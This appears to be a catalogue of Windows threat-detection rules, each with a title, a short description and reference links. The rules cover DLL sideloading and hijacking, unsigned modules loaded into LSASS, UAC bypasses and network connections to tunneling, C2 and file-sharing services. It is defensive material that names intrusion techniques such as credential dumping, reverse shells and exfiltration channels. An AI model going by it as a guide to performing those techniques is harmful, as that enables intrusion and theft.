Potential DCOM InternetExplorer.Application DLL Hijack - Image Load Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
Unsigned Image Loaded Into LSASS Process Loading unsigned image (DLL, EXE) into LSASS process https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
CLR DLL Loaded Via Office Applications Detects CLR DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
DotNET Assembly DLL Loaded Via Office Application Detects any assembly DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Active Directory Parsing DLL Loaded Via Office Application Detects DSParse DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
GAC DLL Loaded Via Office Applications Detects any GAC DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Microsoft Excel Add-In Loaded From Uncommon Location Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location https://www.mandiant.com/resources/blog/lnk-between-browsers, https://wazuh.com/blog/detecting-xll-files-used-for-dropping-fin7-jssloader-with-wazuh/
Active Directory Kerberos DLL Loaded Via Office Application Detects Kerberos DLL being loaded by an Office Product https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
Microsoft VBA For Outlook Addin Loaded Via Outlook Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58
VBA DLL Loaded Via Office Application Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros. https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16
PowerShell Core DLL Loaded Via Office Application Detects PowerShell core DLL being loaded by an Office Product Internal Research
Remote DLL Load Via Rundll32.EXE Detects a remote DLL load event via "rundll32.exe". https://github.com/gabe-k/themebleed, Internal Research
WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load Detects signs of the WMI script host process "scrcons.exe" loading scripting DLLs which could indicates WMI ActiveScriptEventConsumers EventConsumers activity. https://twitter.com/HunterPlaybook/status/1301207718355759107, https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/, https://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html
Potential 7za.DLL Sideloading Detects potential DLL sideloading of "7za.dll" https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d
Abusable DLL Potential Sideloading From Suspicious Location Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html, https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
Potential Antivirus Software DLL Sideloading Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc https://hijacklibs.net/
Potential appverifUI.DLL Sideloading Detects potential DLL sideloading of "appverifUI.dll" https://web.archive.org/web/20220519091349/https://fatrodzianko.com/2020/02/15/dll-side-loading-appverif-exe/
Aruba Network Service Potential DLL Sideloading Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access "arubanetsvc.exe" process using DLL Search Order Hijacking https://twitter.com/wdormann/status/1616581559892545537?t=XLCBO9BziGzD7Bmbt8oMEQ&s=09
Potential AVKkid.DLL Sideloading Detects potential DLL sideloading of "AVKkid.dll" https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
Potential CCleanerDU.DLL Sideloading Detects potential DLL sideloading of "CCleanerDU.dll" https://lab52.io/blog/2344-2/
Potential CCleanerReactivator.DLL Sideloading Detects potential DLL sideloading of "CCleanerReactivator.dll" https://lab52.io/blog/2344-2/
Potential Chrome Frame Helper DLL Sideloading Detects potential DLL sideloading of "chrome_frame_helper.dll" https://hijacklibs.net/entries/3rd_party/google/chrome_frame_helper.html
Potential DLL Sideloading Via ClassicExplorer32.dll Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets, https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/
Potential DLL Sideloading Via comctl32.dll Detects potential DLL sideloading using comctl32.dll to obtain system privileges https://github.com/binderlabs/DirCreate2System, https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt
Potential DLL Sideloading Using Coregen.exe Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs. https://lolbas-project.github.io/lolbas/OtherMSBinaries/Coregen/
Potential DLL Sideloading Of DBGCORE.DLL Detects DLL sideloading of "dbgcore.dll" https://hijacklibs.net/
System Control Panel Item Loaded From Uncommon Location Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading. https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/, https://www.hexacorn.com/blog/2024/01/01/1-little-known-secret-of-hdwwiz-exe/
Potential DLL Sideloading Of DBGHELP.DLL Detects potential DLL sideloading of "dbghelp.dll" https://hijacklibs.net/
Potential DLL Sideloading Of DbgModel.DLL Detects potential DLL sideloading of "DbgModel.dll" https://hijacklibs.net/entries/microsoft/built-in/dbgmodel.html
Potential EACore.DLL Sideloading Detects potential DLL sideloading of "EACore.dll" https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
Potential Edputil.DLL Sideloading Detects potential DLL sideloading of "edputil.dll" https://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/
Potential System DLL Sideloading From Non System Locations Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). https://hijacklibs.net/, https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/, https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/, https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md, https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/
Potential Goopdate.DLL Sideloading Detects potential DLL sideloading of "goopdate.dll", a DLL used by googleupdate.exe https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Potential DLL Sideloading Of Libcurl.DLL Via GUP.EXE Detects potential DLL sideloading of "libcurl.dll" by the "gup.exe" process from an uncommon location https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential Iviewers.DLL Sideloading Detects potential DLL sideloading of "iviewers.dll" (OLE/COM Object Interface Viewer) https://www.secureworks.com/research/shadowpad-malware-analysis
Potential DLL Sideloading Via JsSchHlp Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/, http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp
Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE Detects potential DLL side loading of "KeyScramblerIE.dll" by "KeyScrambler.exe". Various threat actors and malware have been found side loading a masqueraded "KeyScramblerIE.dll" through "KeyScrambler.exe". https://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html, https://csirt-cti.net/2024/02/01/stately-taurus-continued-new-information-on-cyberespionage-attacks-against-myanmar-military-junta/, https://bazaar.abuse.ch/sample/5cb9876681f78d3ee8a01a5aaa5d38b05ec81edc48b09e3865b75c49a2187831/, https://twitter.com/Max_Mal_/status/1775222576639291859, https://twitter.com/DTCERT/status/1712785426895839339
Potential Libvlc.DLL Sideloading Detects potential DLL sideloading of "libvlc.dll", a DLL that is legitimately used by "VLC.exe" https://www.trendmicro.com/en_us/research/23/c/earth-preta-updated-stealthy-strategies.html, https://hijacklibs.net/entries/3rd_party/vlc/libvlc.html
Potential Mfdetours.DLL Sideloading Detects potential DLL sideloading of "mfdetours.dll". While using "mftrace.exe" it can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. Internal Research
Unsigned Mfdetours.DLL Sideloading Detects DLL sideloading of unsigned "mfdetours.dll". Executing "mftrace.exe" can be abused to attach to an arbitrary process and force load any DLL named "mfdetours.dll" from the current directory of execution. Internal Research
Potential DLL Sideloading Of MpSvc.DLL Detects potential DLL sideloading of "MpSvc.dll". https://hijacklibs.net/entries/microsoft/built-in/mpsvc.html
Potential DLL Sideloading Of MsCorSvc.DLL Detects potential DLL sideloading of "mscorsvc.dll". https://hijacklibs.net/entries/microsoft/built-in/mscorsvc.html
Potential DLL Sideloading Of Non-Existent DLLs From System Folders Detects DLL sideloading of system DLLs that are not present on the system by default (at least not in system directories). Usually this technique is used to achieve UAC bypass or privilege escalation. https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992, https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/, https://github.com/Wh04m1001/SysmonEoP, https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/, http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html
Microsoft Office DLL Sideload Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location https://hijacklibs.net/
Potential Python DLL SideLoading Detects potential DLL sideloading of Python DLL files. https://www.securonix.com/blog/seolurker-attack-campaign-uses-seo-poisoning-fake-google-ads-to-install-malware/, https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/, https://github.com/wietze/HijackLibs/tree/dc9c9f2f94e6872051dab58fbafb043fdd8b4176/yml/3rd_party/python
Potential Rcdll.DLL Sideloading Detects potential DLL sideloading of rcdll.dll https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
Potential RjvPlatform.DLL Sideloading From Default Location Detects loading of "RjvPlatform.dll" by the "SystemResetPlatform.exe" binary which can be abused as a method of DLL side loading since the "$SysReset" directory isn't created by default. https://twitter.com/0gtweet/status/1666716511988330499
Potential RjvPlatform.DLL Sideloading From Non-Default Location Detects potential DLL sideloading of "RjvPlatform.dll" by "SystemResetPlatform.exe" located in a non-default location. https://twitter.com/0gtweet/status/1666716511988330499
Potential RoboForm.DLL Sideloading Detects potential DLL sideloading of "roboform.dll", a DLL used by RoboForm Password Manager https://twitter.com/StopMalvertisin/status/1648604148848549888, https://twitter.com/t3ft3lb/status/1656194831830401024, https://www.roboform.com/
Potential ShellDispatch.DLL Sideloading Detects potential DLL sideloading of "ShellDispatch.dll" https://www.hexacorn.com/blog/2023/06/07/this-lolbin-doesnt-exist/
DLL Sideloading Of ShellChromeAPI.DLL Detects processes loading the non-existent DLL "ShellChromeAPI". One known example is the "DeviceEnroller" binary in combination with the "PhoneDeepLink" flag tries to load this DLL. Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter https://mobile.twitter.com/0gtweet/status/1564131230941122561, https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html
Potential SmadHook.DLL Sideloading Detects potential DLL sideloading of "SmadHook.dll", a DLL used by SmadAV antivirus https://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/, https://www.qurium.org/alerts/targeted-malware-against-crph/
Potential SolidPDFCreator.DLL Sideloading Detects potential DLL sideloading of "SolidPDFCreator.dll" https://lab52.io/blog/new-mustang-pandas-campaing-against-australia/
Third Party Software DLL Sideloading Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc) https://hijacklibs.net/
Fax Service DLL Search Order Hijack The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service. https://windows-internals.com/faxing-your-way-to-system/
Potential Vivaldi_elf.DLL Sideloading Detects potential DLL sideloading of "vivaldi_elf.dll" https://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/
VMGuestLib DLL Sideload Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service. https://decoded.avast.io/martinchlumecky/png-steganography/
VMMap Signed Dbghelp.DLL Potential Sideloading Detects potential DLL sideloading of a signed dbghelp.dll by the Sysinternals VMMap. https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766
VMMap Unsigned Dbghelp.DLL Potential Sideloading Detects potential DLL sideloading of an unsigned dbghelp.dll by the Sysinternals VMMap. https://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766
Potential DLL Sideloading Via VMware Xfer Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/
Potential Waveedit.DLL Sideloading Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software. https://www.trendmicro.com/en_us/research/23/f/behind-the-scenes-unveiling-the-hidden-workings-of-earth-preta.html
Potential Wazuh Security Platform DLL Sideloading Detects potential DLL side loading of DLLs that are part of the Wazuh security platform https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html
Potential Mpclient.DLL Sideloading Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
Potential WWlib.DLL Sideloading Detects potential DLL sideloading of "wwlib.dll" https://twitter.com/WhichbufferArda/status/1658829954182774784, https://news.sophos.com/en-us/2022/11/03/family-tree-dll-sideloading-cases-may-be-related/, https://securelist.com/apt-luminousmoth/103332/
Windows Spooler Service Suspicious Binary Load Detect DLL Load from Spooler Service backup folder https://web.archive.org/web/20210629055600/https://github.com/hhlxf/PrintNightmare/, https://github.com/ly4k/SpoolFool
Unsigned Module Loaded by ClickOnce Application Detects unsigned module load by ClickOnce application. https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
DLL Load By System Process From Suspicious Locations Detects when a system process (i.e. located in system32, syswow64, etc.) loads a DLL from a suspicious location or a location with permissive permissions such as "C:\Users\Public" https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)
Python Image Load By Non-Python Process Detects the image load of "Python Core" by a non-Python process. This might be indicative of a Python script bundled with Py2Exe. https://www.py2exe.org/, https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/
DotNet CLR DLL Loaded By Scripting Applications Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution. https://github.com/tyranid/DotNetToJScript, https://thewover.github.io/Introducing-Donut/, https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008
Unsigned DLL Loaded by Windows Utility Detects windows utilities loading an unsigned or untrusted DLL. Adversaries often abuse those programs to proxy execution of malicious code. https://www.elastic.co/security-labs/Hunting-for-Suspicious-Windows-Libraries-for-Execution-and-Evasion, https://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql, https://unit42.paloaltonetworks.com/unsigned-dlls/?web_view=true
Suspicious Unsigned Thor Scanner Execution Detects loading and execution of an unsigned thor scanner binary. Internal Research
UAC Bypass Using Iscsicpl - ImageLoad Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH% https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC, https://twitter.com/wdormann/status/1547583317410607110
UAC Bypass With Fake DLL Attempts to load dismcore.dll after dropping it https://steemit.com/utopian-io/@ah101/uac-bypassing-utility
WMIC Loading Scripting Libraries Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc). https://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html, https://twitter.com/dez_/status/986614411711442944, https://lolbas-project.github.io/lolbas/Binaries/Wmic/
Wmiprvse Wbemcomn DLL Hijack Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html
WMI Persistence - Command Line Event Consumer Detects WMI command line event consumers https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/
Suspicious WSMAN Provider Image Loads Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution. https://twitter.com/chadtilbury/status/1275851297770610688, https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/, https://learn.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture, https://github.com/bohops/WSMan-WinRM
Network Connection Initiated By AddinUtil.EXE Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe". This could indicate a potential command and control communication as this tool doesn't usually initiate network activity. https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
Uncommon Connection to Active Directory Web Services Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management. https://medium.com/falconforce/soaphound-tool-to-collect-active-directory-data-via-adws-165aca78288c, https://github.com/FalconForceTeam/FalconFriday/blob/master/Discovery/ADWS_Connection_from_Unexpected_Binary-Win.md
Uncommon Network Connection Initiated By Certutil.EXE Detects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
Outbound Network Connection Initiated By Cmstp.EXE Detects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious. https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
Outbound Network Connection Initiated By Microsoft Dialer Detects outbound network connection initiated by Microsoft Dialer. The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" https://tria.ge/240301-rk34sagf5x/behavioral2, https://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d, https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/, https://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html
Network Connection Initiated To AzureWebsites.NET By Non-Browser Process Detects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site. https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/, https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia, https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/, https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/
Network Connection Initiated To BTunnels Domains Detects network connections to BTunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://defr0ggy.github.io/research/Utilizing-BTunnel-For-Data-Exfiltration/
Network Connection Initiated To Cloudflared Tunnels Domains Detects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://defr0ggy.github.io/research/Abusing-Cloudflared-A-Proxy-Service-To-Host-Share-Applications/, https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/, Internal Research
Network Communication With Crypto Mining Pool Detects initiated network connections to crypto mining pools https://www.poolwatch.io/coin/monero, https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt, https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files
New Connection Initiated To Potential Dead Drop Resolver Domain Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected. https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/, https://securelist.com/the-tetrade-brazilian-banking-malware/97779/, https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html, https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al
Network Connection Initiated To DevTunnels Domain Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2, https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security, https://cydefops.com/devtunnels-unleashed
Suspicious Dropbox API Usage Detects an executable that isn't dropbox but communicates with the Dropbox API https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb, https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east
Suspicious Network Connection to IP Lookup Service APIs Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of potential post compromise internet test activity. https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md, https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a, https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html
Suspicious Non-Browser Network Communication With Google API Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet) https://github.com/looCiprian/GC2-sheet, https://youtu.be/n2dFlSaBBKo, https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf, https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/, https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/
Communication To LocaltoNet Tunneling Service Initiated Detects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls. https://localtonet.com/documents/supported-tunnels, https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications
Network Connection Initiated To Mega.nz Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads. https://megatools.megous.com/, https://www.mandiant.com/resources/russian-targeting-gov-business
Process Initiated Network Connection To Ngrok Domain Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. https://ngrok.com/, https://ngrok.com/blog-post/new-ngrok-domains, https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/, https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf
Communication To Ngrok Tunneling Service Initiated Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download. https://twitter.com/hakluke/status/1587733971814977537/photo/1, https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
Potentially Suspicious Network Connection To Notion API Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2" https://github.com/mttaggart/OffensiveNotion, https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332
Network Communication Initiated To Portmap.IO Domain Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors https://portmap.io/, https://github.com/rapid7/metasploit-framework/issues/11337, https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2
Suspicious Non-Browser Network Communication With Telegram API Detects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2 https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
Network Connection Initiated To Visual Studio Code Tunnels Domain Detects network connections to Visual Studio Code tunnel domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine. https://ipfyx.fr/post/visual-studio-code-tunnel/, https://badoption.eu/blog/2023/01/31/code_c2.html, https://cydefops.com/vscode-data-exfiltration
Network Connection Initiated By Eqnedt32.EXE Detects network connections from the Equation Editor process "eqnedt32.exe". https://twitter.com/forensicitguy/status/1513538712986079238, https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/, https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/
Network Connection Initiated By IMEWDBLD.EXE Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download, https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
Network Connection Initiated Via Notepad.EXE Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example. https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf, https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet
Office Application Initiated Network Connection To Non-Local IP Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. This rule will require an initial baseline and tuning that is specific to your organization. https://corelight.com/blog/detecting-cve-2021-42292, https://learn.microsoft.com/de-de/microsoft-365/enterprise/urls-and-ip-address-ranges?view=o365-worldwide
Office Application Initiated Network Connection Over Uncommon Ports Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports. https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Python Initiated Connection Detects a Python process initiating a network connection. While this often relates to package installation, it can also indicate a potential malicious script communicating with a C&C server. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-4---port-scan-using-python, https://pypi.org/project/scapy/
Outbound RDP Connections Over Non-Standard Tools Detects Non-Standard tools initiating a connection over port 3389 indicating possible lateral movement. An initial baseline is required before using this utility to exclude third party RDP tooling that you might use. https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708
RDP Over Reverse SSH Tunnel Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389 https://twitter.com/cyb3rops/status/1096842275437625346
RDP to HTTP or HTTPS Target Ports Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443 https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg, https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling
RegAsm.EXE Initiating Network Connection To Public IP Detects "RegAsm.exe" initiating a network connection to public IP adresses https://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/, https://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/, https://lolbas-project.github.io/lolbas/Binaries/Regasm/
Remote Access Tool - AnyDesk Incoming Connection Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows, https://asec.ahnlab.com/en/40263/
Silenttrinity Stager Msbuild Activity Detects a possible remote connections to Silenttrinity c2 https://www.blackhillsinfosec.com/my-first-joyride-with-silenttrinity/
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations. https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
